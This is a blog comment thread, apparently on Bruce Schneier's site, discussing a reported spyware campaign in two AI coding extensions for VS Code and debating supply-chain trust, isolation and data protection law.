Comments

Clive Robinson February 2, 2026 8:46 AM

@ ALL,

From the article, linked to by our host @Bruce, we find,

“AI coding assistants are everywhere. They suggest code, explain errors, write functions, review pull requests. Every developer marketplace is flooded with them – ChatGPT wrappers, Copilot alternatives, code completion tools promising to 10x your productivity.

We install them without a second thought. They’re in the official marketplace. They have thousands of reviews. They work. So we grant them access to our workspaces, our files, our keystrokes – and assume they’re only using that access to help us code.

Not all of them are.

That last sentence given in the quote is “inaccurate” because unless you

1, Run everything locally which few do
2, With proper precautions that few know how to do…

Then,

“All of them are helping themselves to your IP, for their owners benefit not yours”.

It’s what you might now call,

“The Standard model of operation”

To “betray” in multiples of ways as the end game…

Clive Robinson February 2, 2026 8:50 AM

@ ALL,

From the article, linked to by our host @Bruce, we find,

“AI coding assistants are everywhere. They suggest code, explain errors, write functions, review pull requests. Every developer marketplace is flooded with them – ChatGPT wrappers, Copilot alternatives, code completion tools promising to 10x your productivity.

We install them without a second thought. They’re in the official marketplace. They have thousands of reviews. They work. So we grant them access to our workspaces, our files, our keystrokes – and assume they’re only using that access to help us code.

Not all of them are.

That last sentence given in the quote is “inaccurate” because unless you

1, Run everything locally which few know how to do…
2, With proper precautions which few know how to do…

Then,

“All of the Current AI LLM agents are helping themselves to your IP, for their owners benefit not yours”.

It’s what you might now call,

“The Standard model of LLM Surveillance operation”

To “betray” in multiple ways as the end game…

KC February 2, 2026 11:08 AM

re: AI coding assistants

Can Koi review all the AI coding assistants?

Here, Koi says their risk engine identified a spyware campaign within two VS Code extensions.

It has three data exfiltration channels:

  • Real-time monitoring
  • Mass file harvesting
  • Profiling engine

These particular AI extensions — ChatGPT – 中文版 and ChatMoss (CodeMoss) — can grab up to 50 files at a time, including your “secrets, your credentials, your proprietary code.”

And with data profiling they know “who you are, where you are, what company you work for, what you’re working on, what projects matter most to you.”

Astounding. Surprising??

lurker February 2, 2026 1:01 PM

So? You can’t do the job yourself, so you hire somebody to do it. Who? Security 101, do you trust them enough to use your bathroom? Will they look in the kitchen on the way through, and rifle through the cutlery?

VS Code? Do people actually use that for anything outside social media and advertising? Then using an “AI” assistant is, even if you can’t see it, putting your stuff on somebody else’s computer. What could possibly go wrong?

The astonishing thing about this story is that people are surprised it’s happening.

Rontea February 2, 2026 2:29 PM

This is yet another example of why trust in software supply chains is so fragile. We’ve seen time and again that convenience and popularity—1.5 million installs in this case—don’t translate into security. Extensions like these function as privileged observers of your development environment, and the fact that they silently exfiltrate every file and edit is both predictable and avoidable. Developers need to start treating every plugin, every AI assistant, as untrusted code until proven otherwise. The broader lesson is that our tools are attack surfaces, and the market incentives still reward speed and novelty over scrutiny.

Clive Robinson February 2, 2026 3:27 PM

@ Rontea, ALL,

You make the comment of,

“Developers need to start treating every plugin, every AI assistant, as untrusted code until proven otherwise.”

What if I tell you,

“They can not be proven otherwise.”

Where do you go from there?

The answer is “strong segregation” the equivalent of “air gapping”.

As some will know, SCIF’s are,

1, Not cheap to make.
2, Not at all pleasant to work in.
3, Expensive to run.

OK you might think do not need that level of “protection” but the reality is that Current AI LLM & ML Systems, for coding will be aware of every segregation breaching technique on the Internet from the time it was fed into the “wood chipper maw” of the ML system.

They will also be aware of just about every code / cipher system algorithm out there in user-land.

Thus they will know how to make every type of “Data obfuscation technique” you’ve ever heard of upto that point in time, then some you’ve not.

Just something to think about.

Tony February 2, 2026 6:20 PM

Sounds like a win for opensource over closed source. If you plan to publish all your source code, then bits of it sneaking off to China (or elsewhere) during development isn’t as much of a problem as it is for closed source.

lurker February 2, 2026 10:34 PM

@Tony

Whether you are Jedi or not, in this case the source isn’t the prize. They’re after your contacts list, your diary, lunch vouchers, pr0n, it’s amazing the uses thay can find for that stuff …

Jesse Thompson February 7, 2026 1:33 PM

  1. Have strong data protection laws that guarantee the autonomy of flesh and blood human citizens FIRST (and only non-government organizations and corporations a distant SECOND)
  2. Have the fabric of your economic infrastructure rent to pieces by foreign military intelligence, organized crime cartels, blackmailers, and saboteurs

National policy can literally only pick one of these two outcomes. Notice that “build a NOBUS panopticon to house your population in” is not directly one of the options: attempts to do so only guarantee outcome number two.

Clive Robinson February 7, 2026 3:25 PM

@ Jesse Thompson,

With regards,

“Have strong data protection laws that guarantee the autonomy of flesh and blood human citizens FIRST (and only non-government organizations and corporations a distant SECOND)”

Yes you are right in this notion but the way you are expressing it is wrong thus introduces the effects of,

“The law of unexpected consequences”.

It’s why in the EU they make the distinction in a different –but still wrong– way of,

“Any person natural or legal”.

If you consider for a moment, between humans and legal entities lies the whole of the natural world, that also needs protection in oh so many ways. As much for humans in general as for nature it’s self[1].

Thus I think your point needs to be more,

“Have strong data protection laws that guarantee the autonomy of flesh and blood human citizens FIRST (and only non-government organizations and corporations a distant THIRD long after nature and the environment SECOND).”

Though many would argue with good reason as with evolution[1] survival of nature and the environment should come as a very strong FIRST, otherwise we all die[2]…

[1] For the sake of “profit” by corporations we are “eradicating species” at an astounding rate. All species have a niche in nature that often out weighs their position at first sight.

To see this consider insect species even the hated wasps serve a useful purpose. But many lump them and bees together which is kind of a “cats are dogs” problem with many humans.

Bees however are one of the very few pollinators. Without which many plants would die out fairly quickly, then the herbivores that eat those plants would die out or cause issues to other herbivores. Then of course you have the issue of omnivores and carnivores that rely on the herbivores and omnivores as a food source. Which is where you find humans. Thus in the EU they have legislation that protects bees and other insects from corporations unlike the US. And this is one of the reasons that there is a lot of friction between Short Term neo-con anti-social thinking and the rest of us who think more socially. And just one of the reasons I say,

“Individual Rights -v- Social Responsibility”

Which is what evolution does, and it always favours “survival of the species” over “survival of the individual”… Thus it’s very much toward the “Social Responsibility” end of the spectrum…

[2] No this does not make me a “green nut bar”, just a responsible human and parent. Who also happens to believe in the innate goodness of most humans and wanting a future for mine and others children and grandchildren etc. So they can go on and explore and enjoy the natural world and the environment and life it’s self. Which when you think about it we can not do if we are extinct from the stupidity of short term thinking of neo-con “self-entitled” behaviour.

Philippe Delvaux February 16, 2026 7:56 AM

From a non-USA perspective, is it better that the AI tool sends code to China or to the USA ? …

Leave a comment

Blog moderation policy

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.